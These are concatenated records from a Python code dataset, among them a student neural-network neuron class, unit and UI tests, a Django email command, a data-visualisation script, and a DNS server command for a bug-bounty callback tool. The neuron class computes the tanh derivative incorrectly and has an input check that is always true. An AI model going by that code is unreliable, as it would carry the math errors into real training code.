0\n\t\tself.lastKnownInputs \t= []\n\t\tself.lastKnownOutputs\t= []\n\t\tself.numOutputs \t\t= numOutputs\n\t\tself.numInputs \t\t\t= numInputs\n\t\tself.currDerr\t\t\t= 0\n\t\t\n\t\tfor i in range(numInputs):\n\t\t\t#self.weights.append(0.5)\n\t\t\tself.weights.append(r.random())\n\t\t\tself.lastKnownInputs.append(0)\n\t\t#print(self.name,self.weights)\n\t\t\t\n\t\t\t\n\t\t\n\tdef Show(self):\n\t\tprint('\\tNeuron: ', self.name)\n\t\tprint('\\t\\tWeights: ', self.weights )\n\t\tprint('\\t\\tBias: ', self.bias )\n\t\tprint('\\t\\tLearnRate: ', self.learnRate )\n\t\tprint('\\t\\tlastKnownInputs: ', self.lastKnownInputs )\n\t\tprint('\\t\\tlastKnownOutputs: ', self.lastKnownOutputs )\n\t\tprint('\\t\\tCurrent Derrecitive: ', self.currDerr )\n\t\n\t\n\t\n\tdef Check(self, inputs):\n\t\treturn len(inputs) is len(inputs)\n\t\n\t\n\t\n\tdef GetInput(self, inputs):\n\t\tinList = inputs[:]\n\t\tneuronWeightList = self.weights[:]\n\t\tinList.append(1)\n\t\tneuronWeightList.append(self.bias)\n\t\tresult = 0\n\t\tfor idx, i in enumerate(inList):\n\t\t\tresult += i*neuronWeightList[idx]\n\t\treturn result\n\t\n\t\n\tdef Activate(self,inputTotal):\n\t\treturn math.tanh(inputTotal)\t\n\t\n\t\n\tdef FeedForward(self, inputs):\n\t\tresult = 0\n\t\tif not self.Check(inputs):\n\t\t\tprint('Ammount inputs not equal to neuron inputs')\n\t\t\treturn [0]\n\n\t\ttotalInput \t\t\t\t= self.GetInput(inputs)\n\t\tself.lastKnownInputs \t= inputs;\n\t\tresult \t\t\t\t\t= self.Activate(totalInput)\n\t\tself.lastKnownOutputs \t= result\n\t\treturn result\n\t\n\t\n\tdef GetLastKnownInputs(self):\n\t\treturn self.lastKnownInputs\n\t\n\t\n\tdef GetWeights(self):\n\t\tresult = self.weights[:]\n\t\tresult.append(self.bias)\n\t\treturn result\n\t\n\t\n\tdef GetDeltaError(self):\n\t\treturn self.delta;\n\t\n\t\n\t\n\tdef GetDericative(self,input):\n\t\td = 1-math.tanh(math.tanh(input))\n\t\tself.currDerr = d\n\t\treturn d\n\t\n\t\n\t\t\n\tdef BackPropagation(self, weight, activated, desiredOutput, inputs):\n\t\tactualOutput \t\t= self.lastKnownOutputs\n\t\ttotInputs \t\t\t= self.GetInput(inputs)\n\t\tdericative \t\t\t= self.GetDericative(totInputs)\n\t\tself.delta \t\t\t= dericative * (desiredOutput - actualOutput)\n\t\tresult = ( weight + (self.learnRate * activated * self.delta) )\n\t\t#print(result,' = ',weight,'+',self.learnRate,'*',activated,'*', self.delta)\n\t\t#print('DeltaK:',self.delta)\n\t\treturn result\n\n\t\t\n\t\t\n\tdef BackPropagation2(self, weight, activation, deltaError ):\n\t\tresult = (weight + self.learnRate * activation * deltaError)\n\t\tself.delta = deltaError\n\t\t#print(result,' = ',weight,'+',self.learnRate,'*',activation,'*', deltaError)\n\t\t#print('Delta(',self.name,'):',self.delta)\n\t\treturn result\n\t\n\t\n\tdef Train(self, inputs, deltaOutput, isOutput = False):\n\t\tif len(self.weights) < len(inputs):\n\t\t\tprint(\"Error: Inputs Not equal to Weight Ammount\")\n\t\t\treturn []\n\t\t\n\t\tself.newWeights = []\n\t\tfor idx, input in enumerate(inputs):\n\t\t\tw = self.weights[idx]\n\t\t\tnewW = 0.5\n\t\t\tif isOutput:\n\t\t\t\tnewW = self.BackPropagation(w, input, deltaOutput, inputs)\n\t\t\telse:\n\t\t\t\tnewW = self.BackPropagation2(w, input, deltaOutput)\n\t\t\t\n\t\t\tself.newWeights.append(newW)\n\t\t\n\t\treturn self.newWeights\n\n\n\tdef UpdateWeights(self):\n\t\tif 'H0' not in self.name:\t\n\t\t\tself.weights = self.newWeights\n\t\t\tself.bias = self.newWeights[-1]\n\t\t\n\t\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Workspace/Neural_Network/Exercise-4_3/Exercise-4_3_C/neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102195773","text":"from morphocut.graph import Node, Input, Output\nimport copy\nimport pytest\n\n\n@Output(\"outp\")\nclass Source(Node):\n def transform(self):\n for i in range(10):\n yield i\n\n\n@Input(\"inp\")\n@Output(\"outp\")\nclass Inner(Node):\n def transform(self, inp):\n return copy.copy(inp)\n\n\n@Input(\"inp\")\n@Output(\"outp1\")\n@Output(\"outp2\")\nclass InnerMultiOut(Node):\n def transform(self, inp):\n return copy.copy(inp)\n\n\n@Input(\"inp1\")\n@Input(\"inp2\")\n@Output(\"outp\")\nclass InnerMultiIn(Node):\n def transform(self, inp1, inp2):\n return copy.copy(inp1)\n\n\n@Input(\"inp\")\nclass Sink(Node):\n def transform(self, inp):\n return None\n\n\ndef test_node():\n source = Source()\n # 1A: bind unambigous node port with *args\n inner = Inner()(source)\n # 1B: bind explicit node port with *args\n inner2 = Inner()(inner.outp)\n # 2A: bind unambigous node port with **kargs\n inner3 = Inner()(inp=inner2)\n # 2B: bind explicit node port with **kargs\n inner4 = Inner()(inp=inner3.outp)\n sink = Sink()(inner4)\n\n # Check the ports\n assert isinstance(inner.inp, Input)\n assert isinstance(inner.outp, Output)\n\n assert inner.inp._node is inner\n assert inner.outp._node is inner\n\n # Unexpected keyword argument\n with pytest.raises(TypeError):\n Inner()(foo=source)\n\n # Ambigous output\n innermulti = InnerMultiOut()(source)\n with pytest.raises(ValueError):\n Inner()(innermulti)\n\n # Predecessors\n assert inner2.get_predecessors() == {inner}\n\n innermultiin = InnerMultiIn()(source, inner)\n assert innermultiin.get_predecessors() == {source, inner}\n","sub_path":"tests/graph/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"92662052","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.core.mail import EmailMessage\n\nfrom maandagseries.humanpicker.models import Event\nfrom maandagseries.util import parse_date\n\nclass Command(BaseCommand):\n\targs = ''\n\thelp = 'Open an event'\n\n\tdef handle(self, *args, **options):\n\t\tif len(args) != 1:\n\t\t\traise CommandError(\"Usage: openevent %s\" % self.args)\n\t\tev = Event.objects.get(date=parse_date(args[0]))\n\t\tev.open = True\n\t\tev.save()\n\t\tif ev.places > 0:\n\t\t\tmsg = \"Er zijn %d plaatsen. Meld je snel aan op:\\nhttp://maandagseries.quis.cx%s\" % (ev.places, ev.get_absolute_url())\n\t\t\theaders = {'Message-Id': \"<%s@maandagseries.quis.cx>\" % ev.getKey()}\n\t\t\temail = EmailMessage('%s' % ev.date.strftime('%e %b'), msg, 'maandagseries@karpenoktem.nl', ['maandagseries@karpenoktem.nl'], headers=headers)\n\t\t\temail.send()\n","sub_path":"humanpicker/management/commands/openevent.py","file_name":"openevent.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173651430","text":"\"\"\"Observe dataset as raw time series and log-scale spectrogram\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport sys\nimport os\nimport argparse\n\nsys.path.insert(0, os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', '..')))\n\nimport numpy as np\nfrom scipy.signal import stft\nfrom scipy.ndimage import gaussian_filter\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom torch.utils.data import DataLoader\n\nfrom src.utils.load_cfg import ConfigLoader\nfrom src.factories import DatasetFactory\nfrom src.utils.misc import MiscUtils\n\n\ndef parse_args():\n \"\"\"Parse input arguments\"\"\"\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-d', '--dataset_cfg', type=str,\n help='Path to the dataset config filename')\n parser.add_argument(\n '-m', '--mode', type=str,\n choices=['train', 'val', 'test'],\n help='mode to load the dataset')\n parser.add_argument(\n '-t', '--lbl_type', type=str, default='all',\n choices=['on_off', 'dyskinesia', 'tremor', 'all'],\n help='Type of label to load to observe. `all` means all of them')\n parser.add_argument(\n '-n', '--n_samples', type=int,\n help='Number of observation to visualize')\n parser.add_argument(\n '--min_band', type=float, default=None,\n help='Minimum frequency of the frequency band to plot (in Hz)')\n parser.add_argument(\n '--max_band', type=float, default=None,\n help='Maximum frequency of the frequency band to plot (in Hz)')\n parser.add_argument(\n '-o', '--out_dir', type=str,\n help='Output directory to store the visualizations')\n\n args = parser.parse_args()\n\n if not os.path.isdir(args.out_dir):\n os.makedirs(args.out_dir)\n\n if args.min_band is not None:\n assert args.max_band is not None, 'Both mix_band and max_band must be given'\n if args.max_band is not None:\n assert args.min_band is not None, 'Both mix_band and max_band must be given'\n return args\n\n\ndef parse_labels(lbls, lbl_type):\n \"\"\"Parse the labels for figure title\n\n Args:\n lbls: numpy array if lbl_type is `all`, otherwise a floating point\n lbl_type: label type\n \"\"\"\n if lbl_type != 'all':\n return '{} = {}'.format(lbl_type[0], lbls)\n return 'on_off = {}, dyskinesia = {}, tremor = {}'.format(\n lbls[0], lbls[1], lbls[2])\n\n\ndef viz_time_series(samples, ax):\n \"\"\"Plot the time series measurement\n\n Args:\n samples: (N, 4) numpy array where the columns are (t, x, y, z) data\n ax: axis handle\n \"\"\"\n names = ['t', 'x', 'y', 'z']\n for j in range(1, 4):\n ax.plot(samples[:, j], alpha=0.8, label=names[j])\n\n ax.set_title('Time sequence')\n ax.set_xlabel('n_samples')\n ax.set_ylabel('m/s^2')\n ax.legend()\n ax.set_xlim(0, samples.shape[0])\n\n\ndef viz_gradient(samples, ax, sigma=10):\n \"\"\"Plot the gradient of the measurements\n\n Args:\n samples: (N, 4) numpy array where the columns are (t, x, y, z) data\n ax: axis handle\n sigma: standard deviation of Gaussian filter\n \"\"\"\n names = ['t', 'x', 'y', 'z']\n for j in range(1, 4):\n grad = (np.abs(np.gradient(gaussian_filter(samples[:, j], sigma=sigma))))\n ax.plot(grad, alpha=0.8, label='Gradient '+names[j])\n\n ax.set_title('Gradient')\n ax.set_xlabel('n_samples')\n ax.set_ylabel('m/s^3')\n ax.legend()\n ax.set_xlim(0, samples.shape[0])\n\n\ndef viz_spectrogram(samples, sampling_freq, axes, fig,\n min_band=None, max_band=None):\n \"\"\"Plot the spectrogram in log scale using STFT\n\n Args:\n samples: (N, 4) numpy array where the columns are (t, x, y, z) data\n sampling_freq: sampling frequency of samples\n axes: list of axis handles corresponding to x, y, and z\n fig: figure handle\n min_band: minimum frequency of the frequency band to plot (in Hz)\n max_band: maximum frequency of the frequency band to plot (in Hz)\n \"\"\"\n names = ['t', 'x', 'y', 'z']\n for j in range(1, 4):\n stft_freq, stft_time, stft_resp = stft(samples[:, j], fs=sampling_freq)\n stft_resp = (np.log(np.abs(stft_resp))) # log scale of real part\n\n # Zooming a specific range of frequency if specified\n if (min_band is not None) and (max_band is not None):\n min_idx = int(min_band / sampling_freq * 2 * len(stft_freq))\n max_idx = int(max_band / sampling_freq * 2 * len(stft_freq))\n stft_freq = stft_freq[min_idx: max_idx+1]\n stft_resp = stft_resp[min_idx: max_idx+1, :]\n\n # im_handl = axes[j+1].imshow(stft_resp, origin='lower', aspect='auto')\n # fig.colorbar(im_handl, ax=axes[j+1])\n im_handl = axes[j-1].pcolormesh(stft_time, stft_freq, stft_resp)\n fig.colorbar(im_handl, ax=axes[j-1])\n axes[j-1].grid(False)\n\n axes[j-1].set_title('Log-scale STFT - {}-axis'.format(names[j]))\n axes[j-1].set_xlabel('seconds')\n axes[j-1].set_ylabel('Hz')\n\n\ndef viz(loader, args):\n \"\"\"Visualize data\n\n Args:\n loader: initialized data loader\n args: input arguments\n \"\"\"\n # Prepare the environments\n img_dir = os.path.join(args.out_dir, 'imgs')\n if not os.path.isdir(img_dir):\n os.makedirs(img_dir)\n out_fname = os.path.join(args.out_dir, 'viz.html')\n fout = open(out_fname, 'w')\n fmt = '
'\n pbar = MiscUtils.gen_pbar(max_value=args.n_samples, msg='Plotting: ')\n\n # Loop through n_samples and plot\n for i, (samples, labels, msr_ids) in enumerate(loader):\n # Retrieve data\n samples = samples.numpy().squeeze()\n labels = labels.numpy().squeeze()\n n_samples = len(samples)\n duration = samples[-1, 0] - samples[0, 0]\n sampling_freq = 1. * n_samples / duration\n\n # Plot the figure\n fig, axes = plt.subplots(5, 1, figsize=(12, 12), constrained_layout=True)\n\n viz_time_series(samples, axes[0])\n viz_gradient(samples, axes[1])\n viz_spectrogram(samples, sampling_freq, axes[2:5], fig,\n args.min_band, args.max_band)\n fig.suptitle(parse_labels(labels, args.lbl_type))\n\n # Save the figure\n img_fname = os.path.join(img_dir, msr_ids[0]+'.png')\n fig.savefig(img_fname)\n plt.close(fig)\n\n # Add to html\n fout.write(msr_ids[0] + '
')\n fout.write('sampling frequency = {}
'.format(sampling_freq))\n img_fname = img_fname.replace(args.out_dir, '.')\n fout.write(fmt.format(img_fname))\n fout.write('
')\n\n # Update progress\n pbar.update(i+1)\n if i >= args.n_samples-1:\n break\n pbar.finish()\n\n # Close the html file\n fout.close()\n\n\ndef main():\n \"\"\"Main function\"\"\"\n # Load input arguments\n args = parse_args()\n\n # Create dataset and data loader\n dataset_name, dataset_params = ConfigLoader.load_dataset_cfg(args.dataset_cfg)\n\n dataset_factory = DatasetFactory()\n dataset = dataset_factory.generate(\n dataset_name, mode=args.mode, lbl_type=args.lbl_type, **dataset_params)\n\n loader = DataLoader(\n dataset, shuffle=True, drop_last=True, batch_size=1, num_workers=8)\n\n # Vizualize\n sns.set()\n viz(loader, args)\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"track2-vehicle-reid/src/tools/observe_dataset.py","file_name":"observe_dataset.py","file_ext":"py","file_size_in_byte":7420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646050981","text":"import numpy as numpy\n\ndef main():\n for i in range(0, 4):\n for j in range(0, 4):\n row = list(\"c({},{}) = \".format(i, j))\n inputs = [\"a\", \"b\"]\n weights = [\"α\", \"β\"]\n for k in range(len(inputs)):\n for p in range(-1, 2):\n for s in range(-1, 2):\n if i + p >= 0 and j + s >= 0:\n row += list(\"{}({},{}){}({},{}) + \".format(weights[k], p, s, inputs[k], i + p, j + s))\n else:\n row += list(\"{}({},{})0 + \".format(weights[k], p, s))\n print(\"\".join(row))\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"test_caffe/system_nn.py","file_name":"system_nn.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417244896","text":"import sys\nimport os\nimport pytest\n\ntry:\n zbathome = os.environ['ZBAT_HOME']\nexcept:\n print('Test cannot run. Please export ZBAT_HOME.')\n sys.exit()\n\nif zbathome+'lib' not in sys.path:\n sys.path.append(zbathome+'lib')\n \nfrom ui.zbUIGlobalSearch import GlobalSearch\nfrom common.zbCommon import rerunIfFail\nfrom common.zbConfig import NUMBER_RETRIES, DELAY_SECONDS, SCREENSHOT_ON_FAIL\n\n# fixture\n@pytest.fixture(scope=\"module\")\ndef browserGlobalSearch(browser_factory):\n return browser_factory(GlobalSearch)\n\n@pytest.mark.skipif(os.environ[\"NODE_ENV\"] in [\"testing\"], reason=\"Testing doesn't have a functioning global search\") #Testing doesn't have a functioning global search\n@pytest.mark.skipif(os.environ[\"NODE_ENV\"] in [\"staging\"], reason=\"Not enough data\")\n#@pytest.mark.skip(reason=\"Test flaky result. Skip until fixed\")\nclass Test_Global_Search:\n\n @pytest.mark.parametrize(\"testid\",[\"C359696\"])\n @pytest.mark.regression \n def test_global_search_devices(self, testid, browserGlobalSearch):\n selenium = browserGlobalSearch[\"selenium\"]\n assert rerunIfFail(function=selenium.verifyGlobalSearchDevices(), selenium=selenium.selenium, screenshot=SCREENSHOT_ON_FAIL, testname=zbathome+'artifacts/test_global_search_device.png', number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n @pytest.mark.parametrize(\"testid\",[\"C362797\"])\n @pytest.mark.regression \n def test_global_search_alerts(self, testid, browserGlobalSearch):\n selenium = browserGlobalSearch[\"selenium\"]\n assert rerunIfFail(function=selenium.verifyGlobalSearchAlerts(), selenium=selenium.selenium, screenshot=SCREENSHOT_ON_FAIL, testname=zbathome+'artifacts/test_global_search_alerts.png', number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n @pytest.mark.parametrize(\"testid\",[\"C362798\"])\n @pytest.mark.regression\n def test_global_search_results(self, testid, browserGlobalSearch):\n selenium = browserGlobalSearch[\"selenium\"]\n assert rerunIfFail(function=selenium.verifyGlobalSearchResultPage(), selenium=selenium.selenium, screenshot=SCREENSHOT_ON_FAIL, testname=zbathome+'artifacts/test_global_search_alerts.png', number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n","sub_path":"tests/ui/test_global_search.py","file_name":"test_global_search.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"409885325","text":"import numpy as np \r\n\r\nclass stateActionLog:\r\n def __init__(self, sn, sm, st, action):\r\n self.sn = sn #neighboring neighbors observed by the receiving beacons\r\n self.sm = sm #sum of expected neighbors by the neighboring neighbors\r\n self.st = st #the dissemination rate\r\n\r\n self.action = action #action taken by the beacon\r\n\r\n\r\n\r\nclass costLog:\r\n def __init__(self, cost, state, action, contributedBy):\r\n self.contributedBy = [contributedBy]\r\n self.state = state\r\n self.action = [action] \r\n self.cost = [cost]\r\n self.totalCost = [0, 0]\r\n self.update()\r\n\r\n\r\n def update(self):\r\n self.totalCost = [0, 0]\r\n for i, a in enumerate(self.action):\r\n if a == 0:\r\n self.totalCost[0] += self.cost[i]\r\n elif a == 1:\r\n self.totalCost[1] += self.cost[i]\r\n","sub_path":"beaconEnv/stateActionPairLog.py","file_name":"stateActionPairLog.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640559445","text":"from django.conf.urls import patterns, url\nfrom django.http import HttpResponse\n\nfrom Products import views\n\nurlpatterns = patterns('',\n url(r'^(?P\\d+)/', views.product, name='product'),\n url(r'^Category/(?P\\d+)/', views.category, name='category'),\n url(r'^Add/(?P\\d+)/', views.add_to_cart, name='add'),\n url(r'^Remove/(?P\\d+)/', views.add_to_cart, name='remove'),\n url(r'^Update_Cart/$', views.add_to_cart, name='update'),\n \n)\n\n","sub_path":"MedQuipSite/Products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55627745","text":"# -*- encoding: utf-8 -*-\n\nimport re\n\ncource = {\n 'RUR': 64.98,\n 'UAH': 26.42,\n 'EUR': 0.89,\n 'KZT': 337.47,\n 'USD': 1,\n}\n\n\n\ndef process_comment(comment, **kwargs):\n# def process_comment(comment, target_currency,cource,auto_currency=True,source_currency=None,overpay_value=None,overpay_type=None):\n '''\n\n :param comment: comment string\n :param target_currency: currency signature\n :param cource_dict: {'': '\n :param auto: auto detect currqncy\n :param source_currency: currency signature\n :param overpay: overpay float in dollar\n :param overpay_type: 'percent' or 'addition'\n :return: new comment with all replaces\n '''\n\n matches =[\n (re.finditer(r'[\\d]+\\$', comment), 'USD'), # dollar_1 with $\n (re.finditer(r'[\\d]+\\sу\\sе|[\\d]+\\sUSD', comment), 'USD'), # dollar_2 with у е\n (re.finditer(r'[\\d]+\\sГРН|[\\d]+\\sгрн|[\\d]+\\sUAH', comment), 'UAH'), #ГРН грн\n (re.finditer(r'[\\d]+ГР|[\\d]+гр', comment), 'UAH'), #ГР гр\n (re.finditer(r'[\\d]+\\sEUR', comment), 'EUR'),\n (re.finditer(r'[\\d]+\\sKZT', comment), 'KZT'),\n (re.finditer(r'[\\d]+\\sRUR', comment), 'RUR'),\n ]\n\n new_data = compare_matches(comment, matches,\n kwargs['target_currency'],\n kwargs['cource'],\n kwargs['auto_currency'],\n kwargs['overpay_value'],\n kwargs['overpay_type'],\n kwargs['source_currency'])\n\n if not new_data[0]:\n last_match = (re.finditer(r'[\\d]{3}', comment), 'UAH')\n new_comment = compare_matches(comment, [last_match],\n kwargs['target_currency'],\n kwargs['cource'], kwargs['auto_currency'],\n kwargs['overpay_value'],\n kwargs['overpay_type'],\n kwargs['source_currency'])[1]\n else:\n new_comment = new_data[1]\n return new_comment\n\ndef compare_matches(comment, matches,target_cur, cur_dict,auto_currency, overpay_value, overpay_type, source_currency):\n try:\n is_any = False\n for currency_match in matches:\n for match in currency_match[0]:\n if not target_cur:\n target_cur = currency_match[1]\n if auto_currency:\n source_currency = currency_match[1]\n\n text = match.group()\n # print(text)\n value = re.search(r'[\\d]+', text).group()\n # print(cur_dict[source_currency])\n converted = float(value) / cur_dict[source_currency] * cur_dict[target_cur]\n if overpay_value:\n if overpay_type == 'addition':\n converted += overpay_value\n elif overpay_type == 'percent':\n converted += (converted * (overpay_value / 100))\n converted = int(converted)\n if converted < 1: converted += 1\n new_text = '{0} {1}'.format(str(converted), target_cur)\n # print(new_text)\n comment = comment.replace(text, new_text)\n # print(is_any)\n is_any = True\n\n return (is_any, comment)\n except UnboundLocalError:\n msg = 'Price not found in comment %s' % (comment)\n # raise LookupError(msg)\n print(msg)\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462851017","text":"# coding: utf-8\n\n#-------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#--------------------------------------------------------------------------\nimport unittest\n\nimport azure.mgmt.billing\nimport azure.mgmt.subscription\nfrom devtools_testutils import AzureMgmtTestCase\n\nclass MgmtSubscriptionTest(AzureMgmtTestCase):\n\n def setUp(self):\n super(MgmtSubscriptionTest, self).setUp()\n self.subscription_client = self.create_basic_client(azure.mgmt.subscription.SubscriptionClient)\n self.billing_client = self.create_mgmt_client(azure.mgmt.billing.BillingManagementClient)\n\n def test_create_subscription(self):\n enrollment_accounts = list(self.billing_client.enrollment_accounts.list())\n self.assertTrue(len(enrollment_accounts) > 0)\n creation_parameters = azure.mgmt.subscription.models.SubscriptionCreationParameters(\n offer_type='MS-AZR-0148P')\n creation_result = self.subscription_client.subscription_factory \\\n .create_subscription_in_enrollment_account(\n enrollment_accounts[0].name,\n creation_parameters)\n self.assertTrue(len(creation_result.result().subscription_link) > 0)\n\n#------------------------------------------------------------------------------\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"azure-mgmt-subscription/tests/test_mgmt_subscription.py","file_name":"test_mgmt_subscription.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637724483","text":"##############################################################################\n#\n# Copyright (c) 2006 Lovely Systems and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Sampledata for the performance test\n\n$Id$\n\"\"\"\n__docformat__ = 'restructuredtext'\n\nimport os\nimport random\n\nfrom zope import interface\nfrom zope import component\nfrom zope import schema\nfrom zope import event\n\nfrom zope.lifecycleevent import ObjectCreatedEvent\n\nfrom z3c.sampledata.interfaces import ISampleDataPlugin\n\nfrom lovely.tag.interfaces import IUserTagging\nfrom lovely.tag.performance import app\n\n\nclass IUrlsSchema(interface.Interface):\n \"\"\"Sample generator for urls with tags.\"\"\"\n\n numUrls = schema.Int(\n title = u'urls',\n description = u'Number or urls to create.',\n default = 100,\n )\n\n\nclass Urls(object):\n interface.implements(ISampleDataPlugin)\n\n dependencies = []\n schema = IUrlsSchema\n\n def generate(self, context, param, dataSource=None, seed=None):\n numUrls = param['numUrls']\n urls = app.UrlContainer()\n event.notify(ObjectCreatedEvent(urls))\n context['urls'] = urls\n dirname = os.path.dirname(__file__)\n self.tags = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n '40000.words')).readlines()]\n self.shorttags = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n '250.words')).readlines()]\n self.domains = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n 'domain.txt')).readlines()]\n self.protocol = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n 'protocol.txt')).readlines()]\n self.pre = [unicode(line.strip())\n for line in file(os.path.join(dirname,\n 'pre.txt')).readlines()]\n self.rand = random.Random()\n self.rand.seed(seed)\n i = 1\n for urlName in self._urls(numUrls):\n url = app.Url()\n event.notify(ObjectCreatedEvent(url))\n url.url = urlName\n urls['%i'%i] = url\n tagging = IUserTagging(url)\n tagging.tags=self._tags(10)\n i+=1\n return urls\n\n def _tags(self, num, randomLength=True):\n tags = []\n maxRand = len(self.tags)-1\n maxShortRand = len(self.shorttags)-1\n if randomLength:\n num = self.rand.randint(0, num)\n for i in range(num):\n if divmod(i,2)[1]==0:\n tags.append(self.tags[self.rand.randint(0, maxRand)])\n else:\n tags.append(self.shorttags[self.rand.randint(0, maxShortRand)])\n return tags\n\n def _urls(self, num):\n maxTagsRand = len(self.tags)-1\n for i in range(num):\n protocol = self.protocol[self.rand.randint(0, len(self.protocol)-1)]\n pre = self.pre[self.rand.randint(0, len(self.pre)-1)]\n firstPart = self.tags[self.rand.randint(0, maxTagsRand)]\n secondPart = self.tags[self.rand.randint(0, maxTagsRand)]\n domain = self.domains[self.rand.randint(0, len(self.domains)-1)]\n thirdPart = self.tags[self.rand.randint(0, maxTagsRand)]\n forthPart = self.tags[self.rand.randint(0, maxTagsRand)]\n yield u'%s%s.%s.%s/%s/%s.html' %(\n protocol,\n pre,\n firstPart,\n domain,\n thirdPart,\n forthPart,\n )\n\n\nclass IPerformanceTestSiteSamples(interface.Interface):\n \"\"\"Sample generator for the users bookshelfs.\"\"\"\n\n name = schema.TextLine(\n title = u'Name',\n description = u'The name of the site.',\n default = u'Tag Performance'\n )\n\n\nclass PerformanceTestSite(object):\n interface.implements(ISampleDataPlugin)\n\n dependencies = []\n schema = IPerformanceTestSiteSamples\n\n def generate(self, context, param, dataSource=None, seed=None):\n name = param['name']\n testsite = app.PerformanceTestSite()\n event.notify(ObjectCreatedEvent(testsite))\n context[name] = testsite\n return testsite\n","sub_path":"lovely.tag/tags/1.0.0/src/lovely/tag/performance/sampledata.py","file_name":"sampledata.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"541920435","text":"import os\nfrom pathlib import Path\nfrom time import sleep\nfrom dnslib.server import DNSServer\nfrom bountydns.core import logger\nfrom bountydns.dns.resolver import Resolver\nfrom bountydns.dns.logger import DNSLogger\nfrom bountydns.dns.handler import DNSHandler\n\nfrom bountydns.cli.commands.base import BaseCommand\nfrom bountydns.dns.api_client import ApiClient\n\n\nclass DnsServer(BaseCommand):\n name = \"dns-server\"\n aliases = [\"dns\"]\n description = \"run dns server\"\n add_log_level = True\n add_debug = True\n\n @classmethod\n def parser(cls, parser):\n parser.add_argument(\n \"-a\",\n \"--api-url\",\n default=\"http://127.0.0.1:8080\",\n action=\"store\",\n help=\"api url\",\n )\n parser.add_argument(\"-t\", \"--api-token\", action=\"store\", help=\"api token\")\n parser.add_argument(\n \"-p\", \"--port\", action=\"store\", type=int, default=53, help=\"listen port\"\n )\n parser.add_argument(\n \"-l\", \"--listen\", action=\"store\", default=\"127.0.0.1\", help=\"bind address\"\n )\n parser.add_argument(\n \"--no-sync\", action=\"store_true\", help=\"sync api token back to database\"\n )\n return parser\n\n async def run(self):\n port = self.get_port()\n listen = self.get_listen()\n\n # TODO: thread issues?\n api_client = ApiClient(self.get_api_url(), self.get_api_token())\n\n if not api_client.wait_for_up():\n logger.critical(\"could not connect to api. quitting\")\n self.exit(1)\n\n if self.option(\"no_sync\"):\n logger.info(\"skipping syncing api token\")\n else:\n api_client.sync()\n\n resolver = Resolver(api_client)\n udp_server = DNSServer(\n resolver,\n address=listen,\n port=port,\n handler=DNSHandler,\n logger=DNSLogger(api_client),\n )\n tcp_server = DNSServer(\n resolver,\n address=listen,\n port=port,\n tcp=True,\n handler=DNSHandler,\n logger=DNSLogger(api_client),\n )\n\n logger.info(\"starting DNS server on port %d\", port)\n udp_server.start_thread()\n tcp_server.start_thread()\n\n try:\n while udp_server.isAlive():\n sleep(1)\n except KeyboardInterrupt:\n pass\n\n def get_api_url(self):\n if os.environ.get(\"API_URL\", None):\n return os.environ.get(\"API_URL\")\n return self.option(\"api_url\")\n\n def get_api_token(self):\n if os.environ.get(\"API_TOKEN\", None):\n return os.environ.get(\"API_TOKEN\")\n if self.option(\"api_token\", None):\n return self.option(\"api_token\")\n logger.critical(\"api token required\")\n self.exit(1)\n\n def get_port(self):\n return self.option(\"port\")\n\n def get_listen(self):\n return 